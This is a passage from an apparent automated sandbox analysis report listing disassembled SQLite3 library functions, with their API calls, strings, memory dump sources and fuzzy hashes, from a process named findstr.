                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,61E14567), ref: 61E0A9CC
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,61E14567), ref: 61E0A9DF
                                                                                                    • sqlite3_free.SQLITE3(?,?,?,61E14567), ref: 61E0A9E7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 251237202-0
                                                                                                    • Opcode ID: 5f091b8b05422c66fe2bfcc40b35f1953cbd4ee6ed167bd00f2e6e349ecd4a21
                                                                                                    • Instruction ID: 31ab8053d1f8418eccf8b144ded000fe63d5341b70d94186f6e6dd35343b3cb9
                                                                                                    • Opcode Fuzzy Hash: 5f091b8b05422c66fe2bfcc40b35f1953cbd4ee6ed167bd00f2e6e349ecd4a21
                                                                                                    • Instruction Fuzzy Hash: A611F77C568A21DFCF00AFB9C1945147BE6F74638A7558C2BE48887301E738C4D18B42
                                                                                                    Function 61E375E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 61E37607
                                                                                                      • Part of subcall function 61E35200: sqlite3_initialize.SQLITE3 ref: 61E35206
                                                                                                      • Part of subcall function 61E35200: sqlite3_vmprintf.SQLITE3 ref: 61E35220
                                                                                                    • sqlite3_result_error.SQLITE3 ref: 61E3761D
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E37625
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_value_bytes.SQLITE3 ref: 61E37636
                                                                                                    • sqlite3_value_blob.SQLITE3 ref: 61E37643
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_initializesqlite3_mprintfsqlite3_mutex_entersqlite3_result_errorsqlite3_value_blobsqlite3_value_bytessqlite3_vmprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 41035782-0
                                                                                                    • Opcode ID: 68226fdcb77abe9e4ba1e847f63606fd8d25044c3f218b14805ccaf3c7bef125
                                                                                                    • Instruction ID: 9857f6d8a8dd9d0602e9d18689bc35c66917b625f3ea8b095df58055d6247abd
                                                                                                    • Opcode Fuzzy Hash: 68226fdcb77abe9e4ba1e847f63606fd8d25044c3f218b14805ccaf3c7bef125
                                                                                                    • Instruction Fuzzy Hash: A001A9706087909FC300AF6CC48060ABAE4AFCA324F64C96DE599CB362C771C881CB96
                                                                                                    Function 61E544DA Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_randomness.SQLITE3 ref: 61E5465B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_randomness
                                                                                                    • String ID: :$rowid$a
                                                                                                    • API String ID: 2799796375-3478241679
                                                                                                    • Opcode ID: 69d4514a3eb0ffc7e9bfea9f664a44fa60b4814e94fa484129de95c75ca36cff
                                                                                                    • Instruction ID: 870e262e67d79c3937e4883651f0646503c36c1edebc875c16f81a8d2d6ad6c5
                                                                                                    • Opcode Fuzzy Hash: 69d4514a3eb0ffc7e9bfea9f664a44fa60b4814e94fa484129de95c75ca36cff
                                                                                                    • Instruction Fuzzy Hash: 48517BB0A08249CBEB40CFA9C48079DBBF5AF89308F24C56ED9159B355E776D822CB51
                                                                                                    Function 61E36740 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 155COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 61E368F0
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E3691C
                                                                                                      • Part of subcall function 61E366E6: sqlite3_vmprintf.SQLITE3 ref: 61E366FF
                                                                                                      • Part of subcall function 61E366E6: sqlite3_mprintf.SQLITE3 ref: 61E3671D
                                                                                                      • Part of subcall function 61E366E6: sqlite3_free.SQLITE3 ref: 61E36729
                                                                                                      • Part of subcall function 61E366E6: sqlite3_free.SQLITE3 ref: 61E36731
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_mprintf$sqlite3_vmprintf
                                                                                                    • String ID: AND$NOT
                                                                                                    • API String ID: 966554101-2843896482
                                                                                                    • Opcode ID: 7e18db9d6d2fd0ddda107c3720857c3b29ebbeb57157de8c75f588e1058a5517
                                                                                                    • Instruction ID: 1f6ccf8a60ca6947d3799fbc44a6c248b07409c7d8f35210efc9e85b76271ed9
                                                                                                    • Opcode Fuzzy Hash: 7e18db9d6d2fd0ddda107c3720857c3b29ebbeb57157de8c75f588e1058a5517
                                                                                                    • Instruction Fuzzy Hash: 165115B0A087A29BD7119FB9C68126ABBF5AFCC344F70C82DD49987340E734D942DB42
                                                                                                    Function 61E51BFC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_mprintf
                                                                                                    • String ID: NEAR$phrase
                                                                                                    • API String ID: 1840970956-1639708222
                                                                                                    • Opcode ID: ceffcea6f17c9df09fe4b733a4ee3b5d3098670f4b82ec2fa511aabc30688a43
                                                                                                    • Instruction ID: 51c599023d73b1a1eef690347da712f483f2865e6c4af472e5ff1be824d74c3b
                                                                                                    • Opcode Fuzzy Hash: ceffcea6f17c9df09fe4b733a4ee3b5d3098670f4b82ec2fa511aabc30688a43
                                                                                                    • Instruction Fuzzy Hash: 9B515870A042158FDB98EF98C4C0749BBB1AB45319F31C969D8288F315D377E8A2CF81
                                                                                                    Function 61E6DB79 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 128COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E6DB92
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E6DBBC
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E6DD20
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                                    • String ID: a
                                                                                                    • API String ID: 1664011779-581836851
                                                                                                    • Opcode ID: d2e317a55e3bd061cb4d74ab1d76da1edc3110a2e381a81b74e13c86787b2679
                                                                                                    • Instruction ID: 044f17fd799ab27eb5a9b88995d4a7752ff34cf3d6dbe4b6a1a57db9257f1b5c
                                                                                                    • Opcode Fuzzy Hash: d2e317a55e3bd061cb4d74ab1d76da1edc3110a2e381a81b74e13c86787b2679
                                                                                                    • Instruction Fuzzy Hash: AF513874A042468FE704CFA9C484B9ABBF5BF88318FA5C56DD8588F359D7B8D841CB90
                                                                                                    Function 61E26E06 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_win32_is_nt
                                                                                                    • String ID: winAccess
                                                                                                    • API String ID: 2284118020-3605117275
                                                                                                    • Opcode ID: 05eb1fa3807a9a2cdc6c4a03021d76eefac99b75506ff13cdcc2fb3ebc61b860
                                                                                                    • Instruction ID: e78bd91333765150167c56f522195f64759cf503265f1a019a1652df6870c95e
                                                                                                    • Opcode Fuzzy Hash: 05eb1fa3807a9a2cdc6c4a03021d76eefac99b75506ff13cdcc2fb3ebc61b860
                                                                                                    • Instruction Fuzzy Hash: FC318F71904299CFDB10DFA4C86075EB7B5EB89368F21C729EC6897380DB30DA46CB42
                                                                                                    Function 61E3832D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E38368
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E38388
                                                                                                    • sqlite3_result_value.SQLITE3 ref: 61E383D0
                                                                                                      • Part of subcall function 61E37CFF: sqlite3_mprintf.SQLITE3 ref: 61E37D14
                                                                                                      • Part of subcall function 61E37CFF: sqlite3_result_error.SQLITE3 ref: 61E37D2A
                                                                                                      • Part of subcall function 61E37CFF: sqlite3_free.SQLITE3 ref: 61E37D32
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_text$sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_value
                                                                                                    • String ID: replace
                                                                                                    • API String ID: 822508682-211625029
                                                                                                    • Opcode ID: 6cf1a91bab59914e43501d3e826ceaac5c492d2d98acdb018e458936ed1deece
                                                                                                    • Instruction ID: 522ab27d044b8e49858aff03670968573dda79ca924cba1fe7709a71c83270fb
                                                                                                    • Opcode Fuzzy Hash: 6cf1a91bab59914e43501d3e826ceaac5c492d2d98acdb018e458936ed1deece
                                                                                                    • Instruction Fuzzy Hash: A7213D71A083599BCB01DF64C484A9EBBE5AFC5358F24C61AEC88CB360D775E984DB81
                                                                                                    Function 61E1C106 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 61E1C124
                                                                                                      • Part of subcall function 61E18497: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E18178,?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E1849F
                                                                                                    • sqlite3_realloc.SQLITE3 ref: 61E1C172
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E1C188
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                                    • String ID: d
                                                                                                    • API String ID: 211589378-2564639436
                                                                                                    • Opcode ID: 164bb4ca26bcaafdd86527c739e27112bd78e3eb4005f50f429b6ba42670d887
                                                                                                    • Instruction ID: e294e323448624470513dc4597db27ad79ab5d549741f3728edb587babaf0442
                                                                                                    • Opcode Fuzzy Hash: 164bb4ca26bcaafdd86527c739e27112bd78e3eb4005f50f429b6ba42670d887
                                                                                                    • Instruction Fuzzy Hash: 5021D4B5A04245CFDB10CF69C8C1B59BBF4AF89314F14846AC9489B319D778E845CBA1
                                                                                                    Function 61E1F891 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_value_int$sqlite3_result_blob
                                                                                                    • String ID: <
                                                                                                    • API String ID: 2918918774-4251816714
                                                                                                    • Opcode ID: 8c8f7475a73e50702716b922d428a7fcbb0a16132f209a812eebf0aaeceebd32
                                                                                                    • Instruction ID: ec6b5c40004c365a5aa47280939342814ebee729ef25dc6fe6bb92fb5502b405
                                                                                                    • Opcode Fuzzy Hash: 8c8f7475a73e50702716b922d428a7fcbb0a16132f209a812eebf0aaeceebd32
                                                                                                    • Instruction Fuzzy Hash: DC1159B5904646CFCB00CF69D48198ABBF5FF88360F11C56AE8188B320E334E951CF90
                                                                                                    Function 61E28C78 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E28B6C: sqlite3_log.SQLITE3(?,?,?,?,?,61E28C1F), ref: 61E28BA7
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E28CAB
                                                                                                    • sqlite3_value_text.SQLITE3 ref: 61E28CC4
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E28CDE
                                                                                                      • Part of subcall function 61E261DF: sqlite3_log.SQLITE3 ref: 61E26208
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_log$sqlite3_mutex_entersqlite3_mutex_leavesqlite3_value_text
                                                                                                    • String ID: out of memory
                                                                                                    • API String ID: 645246966-2599737071
                                                                                                    • Opcode ID: f252045d5ff9f9c0abe45fc570ef893ce2b1016715b36c03cddb95b8e49d93d2
                                                                                                    • Instruction ID: 37afca554375418e0162a41763963c0fdc3373e458522ea0f8e829b386728713
                                                                                                    • Opcode Fuzzy Hash: f252045d5ff9f9c0abe45fc570ef893ce2b1016715b36c03cddb95b8e49d93d2
                                                                                                    • Instruction Fuzzy Hash: 55018170B092458BDB44AFB9C8E1A1AB7E4AF45318F28C079EC888F305E731D8949792
                                                                                                    Function 61E01440 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: _Jv_RegisterClasses$libgcj-16.dll
                                                                                                    • API String ID: 1646373207-328863460
                                                                                                    • Opcode ID: b16d9df4cb87e72f3c3f2303f82eb60d4921f68d285f8e22a4b6de427f707d1b
                                                                                                    • Instruction ID: 067ea1381a55d3ea2010cff3451601612fac0a48ced2f63e15a0f24cc9071820
                                                                                                    • Opcode Fuzzy Hash: b16d9df4cb87e72f3c3f2303f82eb60d4921f68d285f8e22a4b6de427f707d1b
                                                                                                    • Instruction Fuzzy Hash: 05E06DB4104B018BEB406FE9840A33EBAB5EFC271AF72C81CD4C4862A0E630D4828773
                                                                                                    Function 61E1F4BE Relevance: 6.2, APIs: 4, Instructions: 228COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 61E1F525
                                                                                                      • Part of subcall function 61E18497: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E18178,?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E1849F
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E1F63C
                                                                                                    • sqlite3_result_error_code.SQLITE3 ref: 61E1F75F
                                                                                                    • sqlite3_result_double.SQLITE3 ref: 61E1F774
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
